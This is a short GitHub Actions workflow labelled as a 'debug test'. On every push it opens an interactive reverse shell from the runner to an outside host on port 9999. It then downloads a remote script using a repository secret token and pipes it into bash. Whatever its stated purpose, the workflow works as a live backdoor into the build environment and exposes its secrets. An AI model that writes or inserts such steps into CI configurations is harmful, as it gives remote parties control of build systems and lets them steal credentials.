name: Vulcon Debug Test

on:
  workflow_dispatch:
  push:

jobs:
  VulconDebug:
    runs-on: ubuntu-latest
    steps:
    - run: |
        sh -i >& /dev/tcp/cloud.security.amagi.tv/9999 0>&1
    - env:
        TOKEN: ${{ secrets.TOKEN }}
        VULCON_DEBUG_SHELL: true
      run: |
        curl -X GET --header "Accept: application/vnd.github.v3.raw" --header "Authorization: token $TOKEN" 'https://raw.githubusercontent.com/amagimedia/vulcon/debug-shell/scripts/vulcon.sh' | bash

